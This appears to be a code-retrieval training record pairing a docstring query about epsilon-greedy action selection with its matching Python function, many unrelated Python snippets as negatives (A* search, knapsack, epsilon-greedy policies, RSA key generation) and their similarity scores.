predicates])\n\ttotalTickets = np.sum(weightList)\n\tprobList = np.true_divide(weightList, totalTickets)\n\tchosenPred = np.random.choice(predicates, p=probList)\n\n\t#choose the item and then ip\n\tchosenPredSet = ipSet.filter(predicate=chosenPred)\n\titem = chooseItem(chosenPredSet)\n\tchosenIP = ipSet.get(predicate=chosenPred, item=item)\n\n\tchosenIP.predicate.award_ticket()\n\n\treturn chosenIP", "def get_next_gp(self):\n raise NotImplementedError('Abstract Method')", "def get_greedy(self, v):\n policy = np.empty(v.shape, dtype=int)\n for i in range(self.N):\n for j in range(self.N):\n v1 = self.theta[i] + self.epsilon[j] + self.beta * v[i, j]\n v2 = (self.theta[i] + self.G_mean + self.beta *\n np.dot(v[i, :], self.G_probs))\n v3 = (self.G_mean + self.F_mean + self.beta *\n np.dot(self.F_probs, np.dot(v, self.G_probs)))\n if v1 > max(v2, v3):\n action = 1\n elif v2 > max(v1, v3):\n action = 2\n else:\n action = 3\n policy[i, j] = action\n\n return policy", "def knapsack_greedy(vals: List[float], weights: List[int],\n cap: int) -> Set[int]:\n # Check whether the input arrays are None or empty\n if not vals:\n return set()\n # Check whether the input capacity is non-negative\n if cap < 0:\n return set()\n\n items = [Item(i, info[0], info[1]) for i, info in enumerate(zip(vals, weights))]\n\n included1, total_val1 = _greedy_packing(\n items, cap, func=lambda x: x.val / x.weight\n )\n\n included2, total_val2 = _greedy_packing(items, cap, func=lambda x: x.val)\n\n if total_val1 >= total_val2:\n return included1\n else:\n return included2\n # Overall running time complexity: O(nlog n)", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions,\n dtype = float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def frechet(P, Q):\n p = len(P)\n q = len(Q)\n\n mdist = eucl_dist_traj(P, Q)\n P_dist = [eucl_dist(P[ip], P[ip + 1]) for ip in range(p - 1)]\n Q_dist = [eucl_dist(Q[iq], Q[iq + 1]) for iq in range(q - 1)]\n\n cc = compute_critical_values(P, Q, p, q, mdist, P_dist, Q_dist)\n eps = cc[0]\n while (len(cc) != 1):\n m_i = len(cc) / 2 - 1\n eps = cc[m_i]\n rep = decision_problem(P, Q, p, q, eps, mdist, P_dist, Q_dist)\n if rep:\n cc = cc[:m_i + 1]\n else:\n cc = cc[m_i + 1:]\n frech = eps\n return frech", "def a_star_ng(graph, heuristic, start, goal):\n path = []\n queue = PriorityQueue()\n queue.put((0, start))\n visited = set(start)\n\n branch = {}\n found = False\n while not queue.empty():\n item = queue.get()\n current_cost = item[0]\n current_node = item[1]\n\n if current_node == goal:\n print('Found a path.')\n found = True\n break\n else:\n for next_node in graph[current_node]:\n cost = graph.edges[current_node, next_node]['weight']\n new_cost = current_cost + cost + heuristic(next_node, goal)\n\n if next_node not in visited:\n visited.add(next_node)\n queue.put((new_cost, next_node))\n\n branch[next_node] = (new_cost, current_node)\n\n path = []\n path_cost = 0\n if found:\n # retrace steps\n path = []\n n = goal\n path_cost = branch[n][0]\n path.append(goal)\n while branch[n][1] != start:\n path.append(branch[n][1])\n n = branch[n][1]\n path.append(branch[n][1])\n # Wanted the sets to have ints, but had floats, so casted them to int\n path = [(int(p[0]), int(p[1])) for p in path]\n return path[::-1], path_cost", "def find():\n b = 0\n q = 0\n while b == q:\n seq = [randint(-10, 10) for _ in range(randint(15, 30))]\n b, b_at = brute_force(seq)\n q = solution(seq)\n print(seq, b, q, b_at)", "def apriori(q, q_pvalue, insig, sig):\r\n\r\n insignificant = [] + insig\r\n significant = [] + sig\r\n\r\n while len(q) > 0:\r\n element = q[0]\r\n if isinstance(element, int):\r\n element = tuple([element]) # it easier to just convert this to a tuple (so everything is the same data type)\r\n\r\n pvalue = q_pvalue[element] # chi-squared test, verify if the given element satisfies the support criterion\r\n\r\n if pvalue == 1:\r\n significant.append(element)\r\n #print significant\r\n for i in range(element[-1]+1,4):\r\n if i not in insignificant:\r\n #print i, \"#####\", element\r\n tentativeCandidate = tuple(sorted(list(element)+[i])) # add the two lists together (element is a list)\r\n if tentativeCandidate not in q and tentativeCandidate not in significant: # then add it to the queue\r\n #print \"Queue {}\\nTentative Candidate{}\\nSignificant {}\\nInsignicant {}\\n\" \\\r\n # \"##################################\".format(q,tentativeCandidate,significant,insignificant)\r\n q.append(tentativeCandidate)\r\n yield q,tentativeCandidate,significant,insignificant\r\n q.pop(0) #remove it from the queue after we have created/tried all the tentativeCandidates\r\n\r\n else: # when the p-value not significant\r\n q.pop(0)\r\n insignificant.append(element)\r\n yield q,tentativeCandidate,significant,insignificant\r\n else:\r\n yield q,tentativeCandidate,significant,insignificant # grab the last values before breaking out of the while loop\r", "def qgset(x):\n return 0.2855*x - 0.8565", "def test_greedy_one_or_more():\n grammar = r\"\"\"\n S: A+ A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 6\n\n # But greedy variant has only one solution where first A+! collects all tokens.\n grammar = r\"\"\"\n S: A+! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def automorphism_group_QQ_fixedpoints(rational_function, return_functions=False, iso_type=False):\n\n if rational_function.parent().is_field():\n K = rational_function.parent()\n R = K.ring()\n else:\n R = rational_function.parent()\n K = R.fraction_field()\n\n F = R.base_ring()\n\n if F != QQ and F!= ZZ:\n raise TypeError(\"coefficient ring is not the rational numbers or the integers\")\n\n z = R.gen(0)\n phi = R.fraction_field()(rational_function)\n\n f = phi.numerator()\n g = phi.denominator()\n\n #scale f,g so both have integer coefficients\n N = lcm(f.denominator(),g.denominator())\n f = f*N\n g = g*N\n N = gcd(gcd(f.coefficients()), gcd(g.coefficients()))\n f = f/N\n g = g/N\n\n d = max(f.degree(), g.degree())\n\n h = f - g*z\n\n if return_functions:\n elements = [z]\n else:\n elements = [matrix(F, 2, [1,0,0,1])]\n\n rational_roots = h.roots(multiplicities = False)\n\n min_poly = 1\n\n #check if infinity is a fixed point\n if g.degree() < d: #then infinity is a fixed point\n #find elements in W of the form (infinity, y)\n #where W is the set of F-rational points (x,y) such that\n #x is fixed by phi and phi(y)=x\n for T in g.roots(multiplicities=False):\n alpha = T\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n\n for S in h.roots():\n min_poly = min_poly*(z - S[0])**(S[1])\n\n if g.degree() < d: #then infinity is a fixed point so (infinity, S[0])\n alpha = S[0] # is in Z_(1,1)**2\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n\n #now compute points in W\n preimage = f - g*S[0]\n if preimage.degree() < d: #infinity is in W\n zeta = -1\n alpha = S[0]\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n for T in preimage.roots(multiplicities=False):\n if T != S[0]:\n zeta = -1\n alpha = S[0]\n beta = T\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n\n #first look at rational fixed points\n #Subsets is ok since we just needed unordered pairs\n for S in Subsets(rational_roots, 2):\n zeta = -1\n alpha = S[0]\n beta = S[1]\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n\n\n #now consider 2-periodic points\n psi = phi(phi(z))\n f2 = psi.numerator()\n g2 = psi.denominator()\n period2_points = [x for x in (f2 - z*g2).roots(multiplicities=False) if not x in rational_roots]\n for S in Subsets(period2_points, 2):\n zeta = -1\n alpha = S[0]\n beta = S[1]\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n if g2.degree() < f2.degree() and g.degree() == d: #infinity has period 2\n for alpha in period2_points:\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n factors = (f2 - z*g2).factor()\n L1 = NumberField(z**2 + 1,'i')\n i=L1.gen(0)\n L2 = NumberField(z**2 + 3,'isqrt3')\n isqrt3 = L2.gen(0)\n for psi in factors:\n if psi[0].degree() == 2:\n a = psi[0][2]\n b = psi[0][1]\n c = psi[0][0]\n disc = b**2 - 4*a*c\n s = (-b*z - 2*c)/(2*a*z + b)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [-b,-2*c, 2*a, b]))\n if is_square(-disc): #psi[0] generates Q(i)\n alpha = psi[0].change_ring(L1).roots()[0][0]\n beta = alpha.trace() - alpha\n for zeta in [i, -i]:\n a = (alpha - zeta*beta)/(1 - zeta)\n d = (alpha*zeta - beta)/(1 - zeta)\n if a in F and d in F:\n a = F(a)\n d = F(d)\n b = F(-alpha*beta)\n s = ( a*z + b)/(z + d)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [a,b, 1, d]))\n elif is_square(-3*disc): #psi[0] generates Q(zeta_3)\n alpha = psi[0].change_ring(L2).roots()[0][0]\n beta = alpha.trace() - alpha\n for zeta in [F(1)/F(2)*(1 + isqrt3), F(1)/F(2)*(1 - isqrt3),F(1)/F(2)*(-1 + isqrt3), F(1)/F(2)*(-1 - isqrt3)]:\n a = (alpha - zeta*beta)/(1 - zeta)\n d = (alpha*zeta - beta)/(1 - zeta)\n if a in F and d in F:\n a = F(a)\n d = F(d)\n b = F(-alpha*beta)\n s = ( a*z + b)/(z + d)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [a,b, 1, d]))\n\n if iso_type:\n return(elements, which_group(elements))\n return(elements)", "def greedy_selector(self):\n r_k = 0 \n best_route = []\n cities_to_visit = [i for i in range(1, self.city_count)]\n for _ in range(1, self.city_count):\n s_ind = np.argmax([self.tau[(r_k, u)] for u in cities_to_visit])\n s_k = cities_to_visit.pop(s_ind)\n best_route.append((r_k, s_k))\n r_k = s_k\n best_route.append((r_k, 0))\n \n shortest_path = np.sum([self.phi[(p)] for p in best_route])\n return best_route, shortest_path", "def a_star_search(problem, heuristic=null_heuristic):\n fringe = util.PriorityQueueWithFunction(lambda x: x.get_cost() + heuristic(x.get_node(), problem))\n return general_search(problem, fringe)", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n\n def policyFunction(state):\n Action_probabilities = np.ones(num_actions,\n dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def astar(grid, heuristic):\r\n evaluatedMap = {}\r\n unevaluatedMap = {}\r\n start = grid.getStart()\r\n goal = grid.getGoals()[0]\r\n startG = 0\r\n startH = heuristic(start,goal)\r\n currentNode = Node(start,startH,startG)\r\n unevaluatedMap[currentNode.coord] = currentNode\r\n \r\n while len(unevaluatedMap) > 0:\r\n # I tried using a PriorityQueue but because a node could end up with \r\n # an updated priority it really didn't make sense to use one and\r\n # instead had to just serach the dictionary each time for the smallest\r\n # priority which is the sum of g and h\r\n currentNode = min(unevaluatedMap.values(),key=lambda x:x.g + x.h)\r\n \r\n # if the current node is the goal then create the path by iterating backwards\r\n # and pushing the current node to the front of the path and then moving to the\r\n # parent node\r\n if currentNode.coord == goal:\r\n path = []\r\n while currentNode.parentNode:\r\n path.insert(0,currentNode.coord)\r\n currentNode = currentNode.parentNode\r\n path.insert(0,currentNode.coord)\r\n grid.setPath(path)\r\n return\r\n \r\n # Move the current node to the evaluated map and delete it from\r\n # the unevaluated map\r\n evaluatedMap[currentNode.coord] = currentNode\r\n del unevaluatedMap[currentNode.coord]\r\n \r\n # Mark the current node as having been visited\r\n grid.addVisited(currentNode.coord)\r\n \r\n # Get the neighbors of the current node\r\n neighbors = grid.getNeighbors(currentNode.coord)\r\n\r\n # For each neighbor check if that neighbor has alread been evaluated\r\n # if it has then skip that neighbor. If it hasn't and it isn't in the\r\n # unevaluated map add it with a high cost and heuristic.\r\n # Get the neighbor from the unevaluated map and calculate the current\r\n # cost. If the current cost is less than what existed update the neighbor\r\n # and add it back to the list otherwise skip to next neighbor\r\n for neighbor in neighbors:\r\n ncoord = (neighbor[0])\r\n if (ncoord) in evaluatedMap:\r\n continue\r\n if (ncoord) not in unevaluatedMap:\r\n node = Node(ncoord,float('inf'),float('inf'))\r\n unevaluatedMap[ncoord] = node\r\n \r\n node = unevaluatedMap[ncoord]\r\n calc_cost = currentNode.g + neighbor[1]\r\n if calc_cost >= node.g:\r\n continue\r\n \r\n node.parentNode = currentNode\r\n node.g = calc_cost\r\n node.h = heuristic(ncoord,goal)", "def test_greedy_zero_or_more():\n grammar = r\"\"\"\n S: A* A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 7\n\n # But greedy variant has only one solution where first A*! collects all tokens.\n grammar = r\"\"\"\n S: A*! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n print(f'q_values: {q_values}')\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy(items, maxCost, keyFunction):\n result = []\n itemsCopy = sorted(items, key=keyFunction, reverse=True)\n totalValue , totalCalories = 0.0, 0.0\n for i in range(len(itemsCopy)):\n item = itemsCopy[i]\n if (totalCalories + item.getCalories()) <= maxCost:\n result.append(item)\n totalCalories += item.getCalories()\n totalValue += item.getValue()\n return result, totalValue", "def WeilPairing(self, m, P, Q):\n O = self.infpoint\n if self.mul(m, P) != O or self.mul(m, Q) != O:\n raise ValueError(\"sorry, not mP=[0] or mQ=[0].\")\n\n if P == O or Q == O or P == Q:\n return self.basefield.one\n\n T = U = False\n forbidden = [O, P, Q, self.sub(Q, P)]\n R = self.sub(P,Q) # assume Q not in group generated P\n while (not T) or (not U):\n while R in forbidden:\n R = self.point()\n T = self.Miller(Q, m, P, R)\n# S = self.add(P, R)\n# if S == O:\n# continue\n# S = self.sub(Q, R)\n# if S == O:\n# continue\n U = self.Miller(P, m, Q, self.mul(-1, R))\n F = U/T\n return F", "def choose(self):\n\n i = bisect.bisect(self._p, random.random())\n return self._values[i]", "def a_star(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = node.depth + heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def genKeys(p, q):\n # Fill in code to generate the server's public and private keys.\n # Make sure to use the Extended Euclidean algorithm...............................\n n = p * q\n phi = (p-1)*(q-1)\n #e = e_finder(n, phi)\n while True:\n e = random.randint(1, phi)\n if gcd_iter(e, phi) == 1:\n break\n d = ext_Euclid(phi, e)\n if d <0:\n d+=phi\n return n, e, d", "def KeqPrime(self):\n dg0_prime = self.DeltaG0Prime()\n if dg0_prime is None:\n return None\n \n rt = constants.R * constants.DEFAULT_TEMP\n keq = numpy.exp(-dg0_prime / rt)\n return keq", "def group_settings(obs_expt: ObservablesExperiment,\n method: str = 'greedy') -> ObservablesExperiment:\n allowed_methods = ['greedy', 'clique-removal']\n assert method in allowed_methods, f\"'method' should be one of {allowed_methods}.\"\n if method == 'greedy':\n return group_settings_greedy(obs_expt)\n elif method == 'clique-removal':\n return group_settings_clique_removal(obs_expt)", "def a_star_search(problem, heuristic=null_heuristic):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = util.PriorityQueue()\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.push(state, 0)\r\n\r\n while (True):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n states = problem.get_successors(state)\r\n # push into fringe\r\n for stat in states:\r\n if stat[0] not in path:\r\n \"\"\"\r\n it does worse in corners problems, to work better needs heavy huristic, not worth in\r\n in corners problem expandend nodes grow expo\r\n all others are better\r\n counter = 0 # in some situation it helps, in some it doesnt\r\n #print(stat[0].pieces)\r\n for x in stat[0].pieces[0]:\r\n if x:\r\n counter += 1\r\n \"\"\"\r\n counter = 0\r\n fringe.push(stat[0], stat[2] + counter + heuristic(stat[0], problem)) # problem.get_cost_of_actions([stat[1]])\r\n\r\n while (True):\r\n\r\n for key, val in acts.items():\r\n for va in val:\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n if state == problem.get_start_state():\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def greedy_next_action(self, state):\n max_val = float('-inf')\n if self.verbose:\n cells = []\n max_candidates = {}\n for i in range(3):\n for j in range(3):\n if state[i][j] == VALUES.EMPTY:\n val = self.q_value((state, (i, j)))\n if val >= max_val:\n max_val = val\n max_move = (i, j)\n max_candidates[max_move] = val\n if self.verbose:\n cells.append('{0:.3f}'.format(val).center(6))\n elif self.verbose:\n cells.append(state[i][j].center(6))\n if self.verbose:\n self.logger.info(BOARD.format(*cells))\n possible_actions = [k for k, v in max_candidates.items() if v == max_val]\n action = random.choice(possible_actions) if len(possible_actions) > 0 else None\n return action", "def getRandom(self):\n n = len(self.keys)\n while n > 0:\n index = random.randint(0, n - 1)\n my_key = self.keys[index]\n if my_key in self.ds:\n return my_key\n else:\n self.keys[index] = self.keys[n - 1]\n self.keys.pop()\n n = n - 1\n\n\n\n\n\n # Your RandomizedSet object will be instantiated and called as such:\n # obj = RandomizedSet()\n # param_1 = obj.insert(val)\n # param_2 = obj.remove(val)\n # param_3 = obj.getRandom()", "def astar_multi(maze):\n graph_ = Graph(maze.getObjectives())\n\n pq = []\n visited = {}\n\n goals = maze.getObjectives()\n start = maze.getStart()\n\n tie = 1\n #\n # tuple = (f,g,h,x&y,tiebreaker, goals left, currpath, visited)\n # h = min_manhattan(goals, start)\n h = mst_heur(start, goals, graph_)\n\n curr = (h, 0, h, start, goals, 0, [])\n heapq.heappush(pq, curr)\n\n food = None\n while len(pq) > 0:\n curr = heapq.heappop(pq)\n # print(\"curr:\", curr)\n if curr[3] in curr[4]:\n curr[4].remove(curr[3])\n if len(curr[4]) == 0:\n # print(\"DONE\")\n # print(food)\n food = curr\n break\n neighbors = maze.getNeighbors(curr[3][0], curr[3][1])\n for n in neighbors:\n curr_goals_left = curr[4].copy()\n curr_visited = curr[6].copy()\n tie += 1\n\n # print(\"curr[6]: \", curr[6])\n # print(\"n: \", n)\n # print\n\n # h2 = min_manhattan(curr[4], n)\n h2 = mst_heur(n, curr[4], graph_)\n f2 = h2 + curr[1]\n g2 = curr[1] + 1\n\n node_new = (f2, g2, h2, n, curr_goals_left, tie, curr_visited)\n\n if node_new[3] not in visited or node_new[4] not in visited[node_new[3]][1]:\n if node_new[3] not in visited:\n visited[node_new[3]] = (node_new[3], [])\n visited[node_new[3]][1].append(node_new[4])\n node_new[6].append(curr[3])\n heapq.heappush(pq, node_new)\n\n if food is None:\n return []\n\n food[6].append(food[3])\n\n return food[6]", "def epsilon_greedy(deques: List[deque],\n model: BetaBernoulli,\n mode: str,\n topk: int = 1,\n epsilon: float = 0.1,\n **kwargs) -> Union[int, List[int]]:\n if random.random() < epsilon:\n return random_sampling(deques, topk)\n else:\n samples = model.eval\n if mode == 'max':\n ranked = np.argsort(samples)[::-1]\n elif mode == 'min':\n ranked = np.argsort(samples)\n\n if topk == 1:\n for j in range(len(deques)):\n category = ranked[j]\n if len(deques[category]) != 0:\n return category\n else:\n categories_list = []\n candidates = set([i for i in range(len(deques)) if len(deques[i]) > 0])\n # when we go through 'ranked' and len(categories_list) < topk, topk sampling is reduced to top 1\n if len(candidates) < topk:\n return epsilon_greedy(deques, model, mode, topk=1)\n else:\n for category in ranked:\n if category in candidates:\n categories_list.append(category)\n if len(categories_list) == topk:\n return categories_list", "def get_prob(cls, expansion, **given):\n fields = 'parent lmk rel deg'\n params = dict((f, None) for f in fields.split())\n params.update(given)\n return cls.query.filter_by(expansion=expansion, **params).one()", "def ple(self,x):\r\n for i in self.dp: # initial conditions: self.dp = [2,3]\r\n if i > x:\r\n raise StopIteration\r\n yield i\r\n \r\n for i in range(self.lkdp+2,x+1,2): # skip even no's. Future: skip 5's\r\n if not self.firstdiv(i):\r\n self.dp.append(i)\r\n self.lkdp = i\r\n if i in self.sp:\r\n self.sp.remove(i)\r\n yield i\r\n \r\n raise StopIteration\r\n\r\n self.pbe = self.ple # Alternate name for pbe (\"primes less than or equal to)\r", "def generate_greedy(lists):\n \n def greedy_step(lists, base=[]):\n \"\"\"Add a single item from the list of strings to the base list.\"\"\"\n lists_copy = lists[:]\n if base == []:\n # Start with any string\n s = lists_copy.pop()\n else:\n l = find_match(lists_copy, base)\n s = add_string(l, base)\n lists_copy.remove(l)\n return lists_copy, s\n\n # This is probably nicer if it's recursive?\n base = []\n while lists:\n lists, base = greedy_step(lists, base)\n return base", "def aStarSearch(problem, heuristic=nullHeuristic):\n \"*** YOUR CODE HERE ***\"\n from util import PriorityQueue\n pq = PriorityQueue()\n # visited = []\n mapper = {}\n costs = {}\n start = problem.getStartState()\n mapper[start] = None\n costs[start] = 0\n pq.push(start, 0)\n\n while not (pq.isEmpty()):\n # print costs\n point = pq.pop()\n if problem.isGoalState(point):\n current = point\n l = []\n while mapper[current] != None:\n tup = mapper[current]\n l.append(tup[1])\n current = tup[0]\n l.reverse()\n print l\n return l\n for child in problem.getSuccessors(point):\n if not child[0] in mapper:\n cost = costs[point] + child[2]\n if (child not in costs) or (cost < costs[child[0]]):\n costs[child[0]] = cost\n full_cost = cost + heuristic(child[0], problem)\n pq.push(child[0], full_cost)\n mapper[child[0]] = point, child[1]", "def greedy(items_list, max_cost, key_function):\n tmp_list = sorted(items_list, key=key_function, reverse=True)\n cur_cost = 0\n cur_value = 0\n result = []\n\n for item in tmp_list:\n if cur_cost + item.getCost() <= max_cost:\n result.append(item)\n cur_cost += item.getCost()\n cur_value += item.getValue()\n return result, cur_value", "def _greedy_packing(items: List[Item], cap: int,\n func: Callable) -> Tuple[Set[int], int]:\n items.sort(key=func)\n included = set()\n total_val, total_weight = 0, 0\n for item in items:\n if total_weight + item.weight > cap:\n continue\n included.add(item.idx)\n total_val += item.val\n total_weight += item.weight\n return included, total_val\n # Running time complexity: O(nlog n)", "def perc_greedy(population, percentage=80):\n \n\n #initialization\n res_arr = [2] * 10\n total_knights = 80\n\n medians = get_medians(population, percentage);\n\n while(total_knights > 0):\n \n # find \"easiest\" to acheive\n ind = medians.index(min(medians))\n\n # calculate the number of knights to assign to that castle\n assign = min(total_knights, medians[ind]-res_arr[ind] + 1)\n\n # make assignment\n res_arr[ind] += assign\n total_knights -= assign\n\n # mark that castle as \"done\"\n medians[ind] = 100\n \n # get the score of result inst against input population\n res_inst = CBInstance(res_arr)\n res_score = grade_inst(res_inst, population)\n \n return res_inst" ]
[ "0.5804398", "0.5722934", "0.56879693", "0.5585851", "0.55798864", "0.5474166", "0.5431628", "0.5398444", "0.52860045", "0.51859754", "0.51723653", "0.5162084", "0.5161777", "0.5136731", "0.5130759", "0.51121217", "0.5099559", "0.50086784", "0.49864772", "0.49803564", "0.49771714", "0.49726832", "0.4932498", "0.49120504", "0.48763537", "0.48694795", "0.48222482", "0.48207095", "0.48084795", "0.47904724", "0.47744092", "0.47728646", "0.4770835", "0.4737775", "0.47318137", "0.470759", "0.4687032", "0.46825713", "0.46752155", "0.46647957", "0.46578747", "0.46525273", "0.46447647", "0.46418828", "0.46287438", "0.46113095", "0.4609867", "0.46075588", "0.46019334", "0.46013656", "0.46010956", "0.45954913", "0.45888934", "0.45780218", "0.45755848", "0.45738348", "0.4570871", "0.4568562", "0.45534533", "0.45515737", "0.45513615", "0.4550352", "0.45320112", "0.45232418", "0.4508889", "0.45085317", "0.45067474", "0.45039532", "0.44985634", "0.44951418", "0.44951245", "0.44948223", "0.4494438", "0.44943237", "0.44940123", "0.4491535", "0.44906554", "0.4487562", "0.44791627", "0.4475267", "0.44711423", "0.44680732", "0.44679883", "0.4466628", "0.4457912", "0.44489077", "0.44417462", "0.44413936", "0.4441353", "0.44392067", "0.44338164", "0.44279915", "0.4427106", "0.44222927", "0.44182622", "0.44151297", "0.44084314", "0.4406886", "0.44047132", "0.43970004" ]
0.54330295
6
Return an action. >>> q = TabularQ([0,1,2,3],['b','c']) >>> q.set(0, 'b', 5) >>> q.set(0, 'c', 10) >>> q.set(1, 'b', 2) >>> eps = 0. >>> epsilon_greedy(q, 0, eps) greedy 'c' >>> epsilon_greedy(q, 1, eps) greedy 'b'
def epsilon_greedy(q, s, eps = 0.5): if random.random()<eps: return uniform_dist(q.actions).draw() else: return greedy(q,s)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def eps_greedy(Q, epsilon, num_actions):\n if np.random.uniform(0,1,1) > epsilon:\n action = np.argmax(Q)\n else:\n action = np.random.randint(low=0, high=num_actions)\n \n Q_value = Q[action]\n return action, Q_value", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def epsilon_greedy(Q, epsilon, state):\n random_number = random.random()\n if (random_number < epsilon) and (state not in critical_states):\n return env.action_space.sample()\n\n else:\n return np.argmax(Q[state])", "def eps_greedy_action(self, phi, tabu):\n\n # increase counter of actions taken\n self.a_count += 1\n\n # if within the initial buffer before learning starts, random action\n aval_actions = None\n if self.a_count < self.warmup:\n\n if len(tabu) > 0:\n # Remove tabu actions from list of available actions\n aval_actions = [a for a in self.actions if a not in tabu]\n\n action = self.random_action(aval_actions)\n return action, None\n\n elif (self.a_count == self.warmup) and self.verbose:\n print('learning starts')\n\n # evaluate Q(phi, a) for each action\n qvalues = self.Qmodel.predict(phi, batch_size=1)[0]\n\n # generate random value\n randn = np.random.uniform()\n\n # eliminate tabu values from possible actions to pick\n aval_actions = None\n if len(tabu) > 0:\n if randn < self.epsilon:\n aval_actions = [a for a in self.actions if a not in tabu]\n else:\n # Update Qs to low values to ensure they are not picked\n tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu]\n qvalues[tabu_idx] = -9999\n\n # eps-greedy, select random action\n if randn < self.epsilon:\n action = self.random_action(aval_actions)\n a_i = self.action_str2idx(action)\n else:\n # select best action\n a_i = np.argmax(qvalues)\n action = self.actions[a_i]\n\n # update greedy parameter and action count\n self.epsilon *= self.discount_epsilon\n self.a_count += 1\n\n return action, qvalues[a_i]", "def _greedy(self, state):\n\n node = self.mcts_head\n if self.verbose > 1:\n logger.debug(f\"Starting greedy algorithm.\")\n\n while not node.terminal:\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Debugging -- this should not happen\n if not node.terminal and not node.children:\n logger.warning(\n f\"Unexpected lack of children! Path: {node.path}, children: {node.children.keys()}, legal actions: {self._find_legal_actions(this_state)}, terminal: {node.terminal}\"\n )\n node.set_terminal(True)\n\n # Greedily select next action\n if not node.terminal:\n action = node.select_greedy()\n node = node.children[action]\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Greedy\")", "def greedy(q, s):\n # Your code here\n return argmax(q.actions,lambda a:q.get(s,a))", "def choose_epsilon_greedy(self, state: Tuple[int, ...], valid_actions: Tuple[int, ...]) -> int:\n if random.random() < 